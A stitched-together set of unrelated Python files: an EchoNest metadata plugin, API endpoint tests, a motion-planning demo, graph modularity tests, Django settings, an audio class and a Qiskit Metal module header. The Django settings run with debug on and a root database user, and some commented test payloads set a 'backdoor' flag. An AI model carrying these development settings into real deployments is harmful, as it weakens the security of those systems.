RETRIES times and wait between retries for RETRY_INTERVAL
seconds.
"""
for i in range(RETRIES):
try:
result = func(**kwargs)
except pyechonest.util.EchoNestAPIError as e:
if e.code == 3:
# reached access limit per minute
log.debug(u'echonest: rate-limited on try {0}; '
u'waiting {1} seconds'
.format(i + 1, RETRY_INTERVAL))
time.sleep(RETRY_INTERVAL)
elif e.code == 5:
# specified identifier does not exist
# no use in trying again.
log.debug(u'echonest: {0}'.format(e))
return None
else:
log.error(u'echonest: {0}'.format(e.args[0][0]))
return None
except (pyechonest.util.EchoNestIOError, socket.error) as e:
log.warn(u'echonest: IO error: {0}'.format(e))
time.sleep(RETRY_INTERVAL)
except Exception as e:
# there was an error analyzing the track, status: error
log.debug(u'echonest: {0}'.format(e))
return None
else:
break
else:
# If we exited the loop without breaking, then we used up all
# our allotted retries.
log.error(u'echonest request failed repeatedly')
return None
return result
def _pick_song(self, songs, item):
"""Helper method to pick the best matching song from a list of songs
returned by the EchoNest. Compares artist, title and duration. If
the artist and title match and the duration difference is <= 1.0
seconds, it's considered a match.
"""
if not songs:
log.debug(u'echonest: no songs found')
return
pick = None
min_dist = item.length
for song in songs:
if song.artist_name.lower() == item.artist.lower() \
and song.title.lower() == item.title.lower():
dist = abs(item.length - song.audio_summary['duration'])
if dist < min_dist:
min_dist = dist
pick = song
if min_dist > 2.5:
return None
return pick
def _flatten_song(self, song):
"""Given an Echo Nest song object, return a flat dict containing
attributes we care about. If song is None, return None.
"""
if not song:
return
values = dict(song.audio_summary)
values['id'] = song.id
return values
# "Profile" (ID-based) lookup.
def profile(self, item):
"""Do a lookup on the EchoNest by MusicBrainz ID.
"""
# Use an existing Echo Nest ID.
if ID_KEY in item:
enid = item[ID_KEY]
# Look up the Echo Nest ID based on the MBID.
else:
if not item.mb_trackid:
log.debug(u'echonest: no ID available')
return
mbid = 'musicbrainz:track:{0}'.format(item.mb_trackid)
track = self._echofun(pyechonest.track.track_from_id,
identifier=mbid)
if not track:
log.debug(u'echonest: lookup by MBID failed')
return
enid = track.song_id
# Use the Echo Nest ID to look up the song.
songs = self._echofun(pyechonest.song.profile, ids=enid,
buckets=['id:musicbrainz', 'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Search" (metadata-based) lookup.
def search(self, item):
"""Search the item at the EchoNest by artist and title.
"""
songs = self._echofun(pyechonest.song.search, title=item.title,
results=100, artist=item.artist,
buckets=['id:musicbrainz', 'tracks',
'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Analyze" (upload the audio itself) method.
def prepare_upload(self, item):
"""Truncate and convert an item's audio file so it can be
uploaded to echonest.
Return a ``(source, tmp)`` tuple where `source` is the path to
the file to be uploaded and `tmp` is a temporary file to be
deleted after the upload or `None`.
If conversion or truncation fails, return `None`.
"""
source = item.path
tmp = None
if item.format not in ALLOWED_FORMATS:
if config['echonest']['convert']:
tmp = source = self.convert(source)
if not tmp:
return
if os.stat(source).st_size > UPLOAD_MAX_SIZE:
if config['echonest']['truncate']:
source = self.truncate(source)
if tmp is not None:
util.remove(tmp)
tmp = source
else:
return
if source:
return source, tmp
def convert(self, source):
"""Converts an item in an unsupported media format to ogg. Config
pending.
This is stolen from <NAME> convert plugin.
"""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
log.info(u'echonest: encoding {0} to {1}'.format(
util.displayable_path(source),
util.displayable_path(dest),
))
opts = []
for arg in CONVERT_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
log.debug(u'echonest: encode failed: {0}'.format(exc))
util.remove(dest)
return
log.info(u'echonest: finished encoding {0}'.format(
util.displayable_path(source))
)
return dest
def truncate(self, source):
"""Truncates an item to a size less than UPLOAD_MAX_SIZE."""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
log.info(u'echonest: truncating {0} to {1}'.format(
util.displayable_path(source),
util.displayable_path(dest),
))
opts = []
for arg in TRUNCATE_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
log.debug(u'echonest: truncate failed: {0}'.format(exc))
util.remove(dest)
return
log.info(u'echonest: truncate encoding {0}'.format(
util.displayable_path(source))
)
return dest
def analyze(self, item):
"""Upload the item to the EchoNest for analysis. May require to
convert the item to a supported media format.
"""
prepared = self.prepare_upload(item)
if not prepared:
log.debug(u'echonest: could not prepare file for upload')
return
source, tmp = prepared
log.info(u'echonest: uploading file, please be patient')
track = self._echofun(pyechonest.track.track_from_filename,
filename=source)
if tmp is not None:
util.remove(tmp)
if not track:
log.debug(u'echonest: failed to upload file')
return
# Sometimes we have a track but no song. I guess this happens for
# new / unverified songs. We need to "extract" the audio_summary
# from the track object manually. I don't know why the
# pyechonest API handles tracks (merge audio_summary to __dict__)
# and songs (keep audio_summary in an extra attribute)
# differently.
# Maybe a patch for pyechonest could help?
# First get the (limited) metadata from the track in case
# there's no associated song.
from_track = {}
for key in ATTRIBUTES:
try:
from_track[key] = getattr(track, key)
except AttributeError:
pass
from_track['duration'] = track.duration
# Try to look up a song for the full metadata.
try:
song_id = track.song_id
except AttributeError:
return from_track
songs = self._echofun(pyechonest.song.profile,
ids=[song_id], track_ids=[track.id],
buckets=['audio_summary'])
if songs:
pick = self._pick_song(songs, item)
if pick:
return self._flatten_song(pick)
return from_track # Fall back to track metadata.
# Shared top-level logic.
def fetch_song(self, item):
"""Try all methods to get a matching song object from the
EchoNest. If no method succeeds, return None.
"""
# There are four different ways to get a song. Each method is a
# callable that takes the Item as an argument.
methods = [self.profile, self.search]
if config['echonest']['upload']:
methods.append(self.analyze)
# Try each method in turn.
for method in methods:
song = method(item)
if song:
log.debug(
u'echonest: got song through {0}: {1} - {2} [{3}]'.format(
method.__name__,
item.artist,
item.title,
song.get('duration'),
)
)
return song
def apply_metadata(self, item, values, write=False):
"""Copy the metadata from the dictionary of song information to
the item.
"""
# Update each field.
for k, v in values.iteritems():
if k in ATTRIBUTES:
field = ATTRIBUTES[k]
log.debug(u'echonest: metadata: {0} = {1}'.format(field, v))
if field == 'bpm':
item[field] = int(v)
else:
item[field] = v
if 'key' in values and 'mode' in values:
key = MUSICAL_SCALE[values['key'] - 1]
if values['mode'] == 0: # Minor key
key += 'm'
item['initial_key'] = key
if 'id' in values:
enid = values['id']
log.debug(u'echonest: metadata: {0} = {1}'.format(ID_KEY, enid))
item[ID_KEY] = enid
# Write and save.
if write:
item.try_write()
item.store()
# Automatic (on-import) metadata fetching.
def imported(self, session, task):
"""Import pipeline stage.
"""
for item in task.imported_items():
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song)
# Explicit command invocation.
def requires_update(self, item):
"""Check if this item requires an update from the EchoNest (its
data is missing).
"""
for field in ATTRIBUTES.values():
if not item.get(field):
return True
log.info(u'echonest: no update required')
return False
def commands(self):
fetch_cmd = ui.Subcommand('echonest',
help='Fetch metadata from the EchoNest')
fetch_cmd.parser.add_option(
'-f', '--force', dest='force', action='store_true', default=False,
help='(re-)download information from the EchoNest'
)
def fetch_func(lib, opts, args):
self.config.set_args(opts)
write = config['import']['write'].get(bool)
for item in lib.items(ui.decargs(args)):
log.info(u'echonest: {0} - {1}'.format(item.artist,
item.title))
if self.config['force'] or self.requires_update(item):
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song, write)
fetch_cmd.func = fetch_func
sim_cmd = ui.Subcommand('echosim', help='show related files')
sim_cmd.parser.add_option(
'-t', '--threshold', dest='threshold', action='store',
type='float', default=0.15, help='Set difference threshold'
)
sim_cmd.parser.add_option(
'-f', '--format', action='store', default='${difference}: ${path}',
help='print with custom format'
)
def sim_func(lib, opts, args):
self.config.set_args(opts)
for item in lib.items(ui.decargs(args)):
similar(lib, item, opts.threshold, opts.format)
sim_cmd.func = sim_func
return [fetch_cmd, sim_cmd]
|
from faker import Faker
from restapi.tests import API_URI, FlaskClient
from tests.custom import SeadataTests
class TestApp(SeadataTests):
def test_01(self, client: FlaskClient, faker: Faker) -> None:
# GET /api/orders/my_order_id
# PUT /api/orders/my_order_id
r = client.get(f"{API_URI}/orders/my_order_id")
assert r.status_code == 401
r = client.put(f"{API_URI}/orders/my_order_id")
assert r.status_code == 401
r = client.post(f"{API_URI}/orders/my_order_id")
assert r.status_code == 405
r = client.patch(f"{API_URI}/orders/my_order_id")
assert r.status_code == 405
r = client.delete(f"{API_URI}/orders/my_order_id")
assert r.status_code == 405
# POST /api/orders
# DELETE /api/orders
r = client.post(f"{API_URI}/orders")
assert r.status_code == 401
r = client.delete(f"{API_URI}/orders")
assert r.status_code == 401
r = client.get(f"{API_URI}/orders")
assert r.status_code == 405
r = client.put(f"{API_URI}/orders")
assert r.status_code == 405
r = client.patch(f"{API_URI}/orders")
assert r.status_code == 405
# GET /api/orders/<order_id>/download/<ftype>/c/<code>
r = client.get(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
assert r.status_code == 400
assert self.get_seadata_response(r) == "Invalid file type my_ftype"
r = client.post(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
assert r.status_code == 405
r = client.put(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
assert r.status_code == 405
r = client.patch(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
assert r.status_code == 405
r = client.delete(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
assert r.status_code == 405
headers = self.login(client)
r = client.post(f"{API_URI}/orders", headers=headers, json={})
assert r.status_code == 400
response = self.get_content(r)
assert isinstance(response, dict)
self.check_endpoints_input_schema(response)
r = client.delete(f"{API_URI}/orders", headers=headers, json={})
assert r.status_code == 400
response = self.get_content(r)
assert isinstance(response, dict)
self.check_endpoints_input_schema(response)
# Test download with wrong ftype (only accepts 0x and 1x as types)
r = client.get(f"{API_URI}/orders/my_order_id/download/0/c/my_code")
assert r.status_code == 400
assert self.get_seadata_response(r) == "Invalid file type 0"
# Test download with wrong ftype (only accepts 0x and 1x as types)
r = client.get(f"{API_URI}/orders/my_order_id/download/20/c/my_code")
assert r.status_code == 400
assert self.get_seadata_response(r) == "Invalid file type 20"
# Test download with wrong code (ftype 00 == unrestricted orders)
r = client.get(f"{API_URI}/orders/my_order_id/download/00/c/my_code")
assert r.status_code == 404
error = "Order 'my_order_id' not found (or no permissions)"
assert self.get_seadata_response(r) == error
# order_id = faker.pystr()
# pids = ["00.T12345/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"]
# params = {
# "request_id": order_id, "edmo_code": 12345, "datetime": now,
# "version": "1", "api_function": "order_create_zipfile",
# "test_mode": "true", "parameters": {
# "backdoor": True,
# "login_code": "unknown", "restricted": "false",
# "file_name": f"order_{order_id}_unrestricted",
# "order_number": order_id, "pids": pids, "file_count": len(pids),
# }
# }
# apiclient.call(
# URI, method='post', endpoint='/api/orders',
# token=token, payload=params
# )
# print_section("Request download links")
# # PUT /api/order/<OID> -> return iticket_code
# out = apiclient.call(
# URI, method='put', endpoint='/api/orders/%s' % order_id,
# token=token
# )
# # DELETE ORDER
# params = {
# "request_id": order_id, "edmo_code": 634, "datetime": now,
# "version": "1", "api_function": "delete_orders",
# "test_mode": "true", "parameters": {
# "orders": [order_id],
# "backdoor": True
# }
# }
# apiclient.call(
# URI, method='delete', endpoint='/api/orders',
# token=token, payload=params
# )
|
#!/usr/bin/env python
import os, sys
sys.path.insert(0, "..")
import matplotlib.pyplot as plt
import numpy as np
import pprint
import time
import torch
from torch.utils.data import Dataset, DataLoader
from diff_gpmp2.env.env_2d import Env2D
from diff_gpmp2.robot_models import PointRobot2D
from diff_gpmp2.gpmp2.diff_gpmp2_planner import DiffGPMP2Planner
from diff_gpmp2.utils.helpers import load_params
from diff_gpmp2.datasets import PlanningDataset
use_cuda = False
np.set_printoptions(threshold=sys.maxsize, linewidth=np.inf)
pp = pprint.PrettyPrinter()
torch.set_default_tensor_type(torch.DoubleTensor)
use_cuda = torch.cuda.is_available() if use_cuda else False
device = torch.device('cuda') if use_cuda else torch.device('cpu')
dataset_folder = os.path.abspath('../diff_gpmp2/datasets/dataset_files/dataset_2d_1/')
plan_param_file = os.path.abspath('configs/gpmp2_2d_params.yaml')
robot_param_file = os.path.abspath('configs/robot_2d.yaml')
env_param_file = os.path.abspath('configs/env_2d_params.yaml')
np.random.seed(0)
torch.manual_seed(0)
#Get sample problem from dataset
batch_size = 4
dataset = PlanningDataset(dataset_folder, mode='train', label_subdir='opt_trajs_gpmp2')
dataloader = DataLoader(dataset, batch_size=batch_size,
shuffle=True, num_workers=4)
#Load parameters
env_data, planner_params, gp_params, obs_params, optim_params, robot_data = load_params(plan_param_file, robot_param_file, env_param_file, device)
#Get a batch of data
sample_batch = {}
for i, sample in enumerate(dataloader):
sample_batch = sample
if i == 1:
break
im_b = sample_batch['im']
sdf_b = sample_batch['sdf']
start_b = sample_batch['start']
goal_b = sample_batch['goal']
th_opt_b = sample_batch['th_opt']
# env_params_b = sample_batch['env_params']
env_params = {'x_lims': env_data['x_lims'], 'y_lims': env_data['y_lims']}
#2D Point robot model
robot = PointRobot2D(robot_data['sphere_radius'][0], use_cuda=use_cuda)
#Initial trajectories are just straight lines from start to goal
total_time_step = planner_params['total_time_step']
total_time_sec = planner_params['total_time_sec']
dof = planner_params['dof']
th_init_tmp = torch.zeros((batch_size, int(total_time_step)+1, planner_params['state_dim']), device=device) #Straight line at constant velocity
for j in range(batch_size):
avg_vel = (goal_b[j][0, 0:dof] - start_b[j][0, 0:dof])/total_time_sec
for i in range(int(total_time_step)+1):
th_init_tmp[j][i, 0:2] = start_b[j][0, 0:dof]*(total_time_step - i)*1./total_time_step*1. + goal_b[j][0, 0:dof] * i*1./total_time_step*1. #+ np.array([0., 5.0])
th_init_tmp[j][i, 2:4] = avg_vel
th_init_b = th_init_tmp
th_init_b.requires_grad_(True)
planner = DiffGPMP2Planner(gp_params, obs_params, planner_params, optim_params, env_params, robot, use_cuda=use_cuda)
th_finalb, err_initb, err_finalb, err_per_iterb, jb, timeb = planner.forward(th_init_b, start_b, goal_b, im_b, sdf_b)
# print('Num iterations = {}, Time taken = {}'.format(k, time_taken))
plt.ion()
for i in range(batch_size):
im = im_b[i, 0, :, :]
sdf = sdf_b[i, 0, :, : ]
start = start_b[i]
goal = goal_b[i]
th_f = th_finalb[i]
th_opt = th_opt_b[i]
env = Env2D(env_params)
env.initialize_from_image(im, sdf)
path_f = []
path_opt = []
for i in range(th_opt.shape[0]):
path_f.append(th_f[i,0:2])
path_opt.append(th_opt[i,0:2])
env.initialize_plot(start[0][0:2], goal[0][0:2])
env.plot_edge(path_f)
# env.plot_edge(path_opt)
env.plot_signed_distance_transform()
plt.show()
input('Press enter to view next data point')
env.close_plot()
plt.close() |
<filename>build/lib/brainx/tests/test_weighted_modularity.py<gh_stars>1-10
"""Tests for the weighted_modularity module"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import unittest
# Third party
import networkx as nx
import nose.tools as nt
import numpy as np
import numpy.testing as npt
# Our own
from .. import util
from .. import weighted_modularity as wm
def get_test_data():
""" grabs local txt file with adj matrices
Returns
=======
graph : networkx graph
communities : list of sets
"""
pth, _ = os.path.split(__file__)
testdir = os.path.join(pth, 'tdata_corr_txt')
data_file = os.path.join(testdir, '101_Block01.txt')
mat = np.loadtxt(data_file)
mat[mat<0] = 0
graph = nx.from_numpy_matrix(mat)
# graph has 85 nodes, make generic communities
communities = [set(range(42)), set(range(42,86))]
return graph, communities
class TestWeightedPartition(unittest.TestCase):
def setUp(self):
## generate a default graph and communities
graph, communities = get_test_data()
self.graph = graph
self.communities = communities
def test_init(self):
part = wm.WeightedPartition(self.graph)
self.assertEqual(type(part.degrees), type({}))
npt.assert_array_almost_equal(part.total_edge_weight, 1500.5653444)
# generated communities
comm = [set([node]) for node in self.graph.nodes()]
self.assertEqual(part.communities, comm)
# test communities cannot be replaced by garbage
with self.assertRaises(TypeError):
part.communities = 11
# doesnt work if nodes are missing from partition
with self.assertRaises(ValueError):
part.communities = [set([1,2,3])]
# but we can pass a valid community partition
part.communities = comm
self.assertEqual(part.communities, comm)
def test_communities_degree(self):
## if no community, method will raise error
part = wm.WeightedPartition(self.graph)
part = wm.WeightedPartition(self.graph, self.communities)
cdegree = part.communities_degree()
self.assertEqual(round(cdegree[0]), 1462.0)
def test_set_communities(self):
part = wm.WeightedPartition(self.graph, self.communities)
self.assertEqual(part.communities, self.communities)
with self.assertRaises(TypeError):
# raise error if not list of sets
part.set_communities(part.communities[0])
with self.assertRaises(TypeError):
part.set_communities('a')
with self.assertRaises(ValueError):
## missing nodes
comm = self.graph.nodes()[:-3]
part.set_communities([set(comm)])
def test_allnodes_in_communities(self):
"""checks communities contain all nodes
with no repetition"""
part = wm.WeightedPartition(self.graph)
self.assertTrue(part._allnodes_in_communities(self.communities))
self.assertFalse(part._allnodes_in_communities([self.communities[0]]))
def test_get_node_community(self):
part = wm.WeightedPartition(self.graph, self.communities)
self.assertEqual(part.get_node_community(0), 0)
self.assertEqual(part.get_node_community(self.graph.nodes()[-1]),1)
with self.assertRaises(ValueError):
part.get_node_community(-1)
part = wm.WeightedPartition(self.graph)
self.assertEqual(part.get_node_community(0), 0)
def test_node_degree(self):
part = wm.WeightedPartition(self.graph) # one comm per node
node = 0
res = part.node_degree(node)
npt.assert_almost_equal(res, 37.94151675 )
def test_modularity(self):
part = wm.WeightedPartition(self.graph, self.communities)
npt.assert_almost_equal(part.modularity(), 0.0555463)
def test_degree_by_community(self):
part = wm.WeightedPartition(self.graph) # one comm per node
## summ of all links in or out of communities
## since one per scommunity, just weighted degree of each node
tot_per_comm = part.degree_by_community()
degw = self.graph.degree(weight='weight').values()
self.assertEqual(tot_per_comm, degw)
## This isnt true of we have communities with multiple nodes
part_2comm = wm.WeightedPartition(self.graph, self.communities)
self.assertEqual(part_2comm == degw, False)
def test_degree_within_community(self):
part = wm.WeightedPartition(self.graph) # one comm per node
weights = part.degree_within_community()
## this inlcudes self links so
self.assertEqual(weights[0], 1.0)
def test_node_degree_by_community(self):
part = wm.WeightedPartition(self.graph) # one comm per node
node = 0
node2comm_weights = part.node_degree_by_community(node)
# self loops not added to weight
# so communities made only of node should be zero
npt.assert_equal(node2comm_weights[0],0)
# this should be equal to weight between two nodes
neighbor = 1
expected = self.graph[node][neighbor]['weight']
npt.assert_equal(node2comm_weights[neighbor],expected)
part = wm.WeightedPartition(self.graph, self.communities)
node2comm_weights = part.node_degree_by_community(node)
npt.assert_equal(len(node2comm_weights), 2)
class TestLouvainCommunityDetection(unittest.TestCase):
def setUp(self):
## generate a default graph and communities
graph, communities = get_test_data()
self.graph = graph
self.communities = communities
self.louvain = wm.LouvainCommunityDetection(graph)
self.louvain_comm = wm.LouvainCommunityDetection(graph, communities)
def test_init(self):
louvain = self.louvain
self.assertEqual(louvain.graph, self.graph)
self.assertEqual(louvain.initial_communities, None)
self.assertEqual(louvain.minthr, 0.0000001)
def test_communities_without_node(self):
part = wm.WeightedPartition(self.graph) # one comm per node
node = 0
updated_comm = self.louvain._communities_without_node(part, node)
self.assertEqual(updated_comm[0], set([]))
part = wm.WeightedPartition(self.graph, self.communities)
updated_comm = self.louvain_comm._communities_without_node(part, node)
## make sure we dont break communities from original partition
self.assertEqual(part.communities, self.communities)
self.assertEqual(0 not in updated_comm[0], True)
def test_communities_nodes_alledgesw(self):
part = wm.WeightedPartition(self.graph, self.communities)
node = 0
weights = self.louvain_comm._communities_nodes_alledgesw(part, node)
npt.assert_almost_equal(weights[0], 1424.0220362)
## test with possible empty node set
part = wm.WeightedPartition(self.graph)
weights = self.louvain._communities_nodes_alledgesw(part, node)
self.assertEqual(weights[0], 0)
# other communities are made up of just one node
self.assertEqual(weights[1], self.graph.degree(weight='weight')[1])
def test_calc_delta_modularity(self):
part = wm.WeightedPartition(self.graph) # one comm per node
node = 0
change = self.louvain._calc_delta_modularity(node, part)
self.assertEqual(len(change), len(part.communities))
# change is an array
self.assertEqual(change.shape[0], len(part.communities))
self.assertEqual(change[0] < change[1], True)
# this is one comm per node, so once removed from own
# comm, this delta_weight will be zero
self.assertEqual(change[node] , 0)
def test_move_node(self):
part = wm.WeightedPartition(self.graph) # one comm per node
#move first node to second community
node = 0
comm = 1
newpart = self.louvain._move_node(part, node, comm)
self.assertEqual(set([0,1]) in newpart.communities, True)
## what happens if node or comm missing
with self.assertRaises(ValueError):
newpart = self.louvain._move_node(part, -1, comm)
invalid_communities = len(part.communities) + 1
with self.assertRaises(IndexError):
newpart = self.louvain._move_node(part, node, invalid_communities)
def test_gen_dendogram(self):
graph = nx.Graph()
nodeslist = [0,1,2,3,4]
graph.add_nodes_from(nodeslist, weight=True)
louvain = wm.LouvainCommunityDetection(graph)
self.assertRaises(IOError, louvain._gen_dendogram)
def test_run(self):
karate = nx.karate_club_graph()
louvain = wm.LouvainCommunityDetection(karate)
final_partitions = louvain.run()
self.assertEqual(final_partitions[-1].modularity() > .38,
True)
self.assertEqual(len(final_partitions), 2)
def test_combine(self):
first = [set([0,1,2]), set([3,4,5]), set([6,7])]
second = [set([0,2]), set([1])]
npt.assert_raises(ValueError, self.louvain._combine, second, first)
res = self.louvain._combine(first, second)
npt.assert_equal(res, [set([0,1,2,6,7]), set([3,4,5])])
def test_meta_graph():
graph, communities = get_test_data()
part = wm.WeightedPartition(graph)
metagraph,_ = wm.meta_graph(part)
## each node is a comm, so no change to metagraph
npt.assert_equal(metagraph.nodes(), graph.nodes())
## two communitties
part = wm.WeightedPartition(graph, communities)
metagraph,mapping = wm.meta_graph(part)
npt.assert_equal(metagraph.nodes(), [0,1])
npt.assert_equal(metagraph.edges(), [(0,0),(0,1), (1,1)])
# mapping should map new node 0 to communities[0]
npt.assert_equal(mapping[0], communities[0])
## weight should not be lost between graphs
npt.assert_almost_equal(metagraph.size(weight='weight'),
graph.size(weight='weight'))
|
<reponame>codyowl/activitytracker<gh_stars>1-10
"""
Django settings for activitytracker project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# import dj_database_url
# from decouple import Csv, config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# DATABASES['default'] = dj_database_url.config()
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = <KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# ALLOWED_HOSTS = ['*']
ALLOWED_HOSTS = [ ]
# ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'activities',
'home',
'Custom',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'activitytracker.urls'
WSGI_APPLICATION = 'activitytracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
#for heroku
# DEBUG = config('DEBUG', default=False, cast=bool)
# DATABASES = {
# 'default': dj_database_url.config(
# default=config('DATABASE_URL')
# )
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'activitytracker',
'USER': 'root',
'PASSWORD': '<PASSWORD>',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
"django.contrib.auth.context_processors.auth",
]
}
}
]
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
)
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = '<EMAIL>'
#Must generate specific password for your app in [gmail settings][1]
EMAIL_HOST_PASSWORD = '<PASSWORD>'
EMAIL_PORT = 587
#This did the trick
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
GITHUB_CLIENT = ''
GITHUB_TOKEN = '' |
import numpy as np
import librosa
import soundfile as sf
class AudioSegment(object):
"""Monaural audio segment abstraction.
:param samples: Audio samples [num_samples x num_channels].
:type samples: ndarray.float32
:param sample_rate: Audio sample rate.
:type sample_rate: int
:raises TypeError: If the sample data type is not float or int.
"""
def __init__(self, samples, sample_rate, target_sr=None):
"""Create audio segment from samples.
Samples are convert float32 internally, with int scaled to [-1, 1].
"""
samples = self._convert_samples_to_float32(samples)
if target_sr is not None and target_sr != sample_rate:
samples = librosa.core.resample(samples, sample_rate, target_sr)
sample_rate = target_sr
self._samples = samples
self._sample_rate = sample_rate
if self._samples.ndim >= 2:
self._samples = np.mean(self._samples, 1)
def __eq__(self, other):
"""Return whether two objects are equal."""
if type(other) is not type(self):
return False
if self._sample_rate != other._sample_rate:
return False
if self._samples.shape != other._samples.shape:
return False
if np.any(self.samples != other._samples):
return False
return True
def __ne__(self, other):
"""Return whether two objects are unequal."""
return not self.__eq__(other)
def __str__(self):
"""Return human-readable representation of segment."""
return ("%s: num_samples=%d, sample_rate=%d, duration=%.2fsec, "
"rms=%.2fdB" % (type(self), self.num_samples, self.sample_rate,
self.duration, self.rms_db))
@staticmethod
def _convert_samples_to_float32(samples):
"""Convert sample type to float32.
Audio sample type is usually integer or float-point.
Integers will be scaled to [-1, 1] in float32.
"""
float32_samples = samples.astype('float32')
if samples.dtype in np.sctypes['int']:
bits = np.iinfo(samples.dtype).bits
float32_samples *= (1. / 2**(bits - 1))
elif samples.dtype in np.sctypes['float']:
pass
else:
raise TypeError("Unsupported sample type: %s." % samples.dtype)
return float32_samples
@classmethod
def from_file(cls, filename, target_sr=None, int_values=False):
"""
Load a file supported by librosa and return as an AudioSegment.
:param filename: path of file to load
:param target_sr: the desired sample rate
:param int_values: if true, load samples as 32-bit integers
:return: numpy array of samples
"""
samples, sample_rate = sf.read(filename)
if int_values:
samples *= (1 << 31)
samples = samples.transpose()
return cls(samples, sample_rate, target_sr=target_sr)
@property
def samples(self):
return self._samples.copy()
@property
def sample_rate(self):
return self._sample_rate
@property
def num_samples(self):
return self._samples.shape[0]
@property
def duration(self):
return self._samples.shape[0] / float(self._sample_rate)
@property
def rms_db(self):
mean_square = np.mean(self._samples**2)
return 10 * np.log10(mean_square)
def gain_db(self, gain):
self._samples *= 10. ** (gain / 20.)
def subsegment(self, start_time=None, end_time=None):
"""Cut the AudioSegment between given boundaries.
Note that this is an in-place transformation.
:param start_time: Beginning of subsegment in seconds.
:type start_time: float
:param end_time: End of subsegment in seconds.
:type end_time: float
:raise ValueError: If start_time or end_time is incorrectly set, e.g. out
of bounds in time.
"""
start_time = 0.0 if start_time is None else start_time
end_time = self.duration if end_time is None else end_time
if start_time < 0.0:
start_time = self.duration + start_time
if end_time < 0.0:
end_time = self.duration + end_time
if start_time < 0.0:
raise ValueError("The slice start position (%f s) is out of "
"bounds." % start_time)
if end_time < 0.0:
raise ValueError("The slice end position (%f s) is out of bounds." %
end_time)
if start_time > end_time:
raise ValueError("The slice start position (%f s) is later than "
"the end position (%f s)." % (start_time, end_time))
if end_time > self.duration:
raise ValueError("The slice end position (%f s) is out of bounds "
"(> %f s)" % (end_time, self.duration))
start_sample = int(round(start_time * self._sample_rate))
end_sample = int(round(end_time * self._sample_rate))
self._samples = self._samples[start_sample:end_sample]
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import heapq
import numpy as np
from qiskit_metal import Dict
from qiskit_metal.qlibrary.core import QRoutePoint
from .anchored_path import RouteAnchors
from qiskit_metal.toolbox_metal import math_and_overrides as mao
from collections import OrderedDict
from qiskit_metal.toolbox_metal.exceptions import QiskitMetalDesignError
class RoutePathfinder(RouteAnchors):
"""
Non-meandered CPW class that combines A* pathfinding algorithm with
simple 1-, 2-, or S-shaped segment checks and user-specified anchor points.
1. A* heap modified to prioritize paths with shortest length_travelled + Manhattan distance to destination.
2. Checks if connect_simple is valid each time we pop from the heap. If so, use it, otherwise proceed with A*.
3. Tweaks connect_simple to account for end anchor direction in determining which CPW (elbow or S-segment) to use.
RouteAnchors Default Options:
* anchors: OrderedDict -- Intermediate anchors only; doesn't include endpoints
